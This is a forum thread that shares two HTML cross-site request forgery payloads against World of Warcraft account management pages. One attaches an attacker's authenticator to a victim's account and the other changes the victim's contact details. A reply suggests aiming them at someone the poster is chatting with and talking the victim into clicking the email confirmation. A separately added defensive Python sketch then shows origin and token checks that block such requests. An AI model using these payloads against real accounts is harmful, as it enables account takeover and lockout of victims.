  1. #1
    reduction (Member)

    Account admin vulnerabilities

    The person you are targeting must be logged in when they visit a webpage with one of these pieces of HTML code on it. This could be much sneakier if the code was in a hidden iframe.

    I have not been able to test many of these but there is no reason they shouldn't work.

    Set an authenticator onto someone's account
    HTML Code:
    <form id="formSecurityToken" method="post" name="formSecurityToken" action="https://www.worldofwarcraft.com/account/physical-security-token.html">
    <input type="hidden" name="tokenID" value="<insert authenticator id here>"  />
    </form>
    <script type="text/javascript">document.getElementById('formSecurityToken').submit();</script>
    Change someone's contact information (attempting to change their email will send them a confirmation email to the old address):
    HTML Code:
    <form id="form1" name="form1" method="post" action="https://www.worldofwarcraft.com/account/change-contact.html">
    <input name="newEmail" value="<new email>" type="hidden" />
    <input name="newPhoneNumber1" value="<insert daytime phone number>" type="hidden" />
    <input name="newPhoneNumber1Ext" value="<insert daytime phone extension>" type="hidden" />
    <input name="newPhoneNumber2" value="<insert evening phone number>" type="hidden" />
    <input name="newPhoneNumber2Ext" value="<insert evening phone extension>" type="hidden" />
    </form>
    <script type="text/javascript">document.getElementById('form1').submit();</script>
    more to come.

  2. #2
    Tierman (Active Member)
    Wow. So I just add this to the html of my page? How will I know which accounts I changed the info on?

  3. #3
    reduction (Member)
    Originally Posted by Tierman
    Wow. So I just add this to the html of my page? How will I know which accounts I changed the info on?
    It will not work if they are not logged into account admin at the time. There is no way of knowing whose information you changed. The best use of this would be to use this against someone you are communicating with.

    Changing someone's email address will send the original email address a confirmation email asking them to click a link. You might be able to convince them to click the link.

    Read this for more information on this type of exploit:
    Cross-site request forgery - Wikipedia, the free encyclopedia
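
Added example, not part of the thread and not the service's own code: a server-side gate that rejects the kind of cross-site auto-submitted form post described above, by requiring a same-origin request and a per-session anti-CSRF token. The origin `https://account.example`, the `csrfToken` field name and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions for this sketch: the site origin, the "csrfToken" field name and
# the in-process key are hypothetical, not taken from the real service.
SITE_ORIGIN = "https://account.example"
SERVER_KEY = secrets.token_bytes(32)   # constructed per-process secret


def issue_token(session_id: str) -> str:
    """Token embedded in every form the site itself renders for this session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is ours."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False                      # fail closed when both are absent
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def allow_state_change(method: str, headers: dict, form: dict, session_id: str) -> bool:
    """Gate for handlers that modify the account (contact details, tokens)."""
    if method != "POST":
        return False                      # never change state on GET
    if not same_origin(headers):
        return False
    supplied = form.get("csrfToken", "").encode()
    return hmac.compare_digest(supplied, issue_token(session_id).encode())


# Constructed requests: a cross-site auto-submitted form and a genuine one.
SESSION = "constructed-session-id"
FORGED = {"newEmail": "x@other.example", "newPhoneNumber1": "555-0100"}
GENUINE = dict(FORGED, csrfToken=issue_token(SESSION))

if __name__ == "__main__":
    print(allow_state_change("POST", {"Origin": "https://other.example"}, FORGED, SESSION))
    print(allow_state_change("POST", {"Origin": SITE_ORIGIN}, GENUINE, SESSION))
```

The forged request fails both checks: its Origin is foreign, and a page on another site cannot read the token from the victim's session. Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer on top of this.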
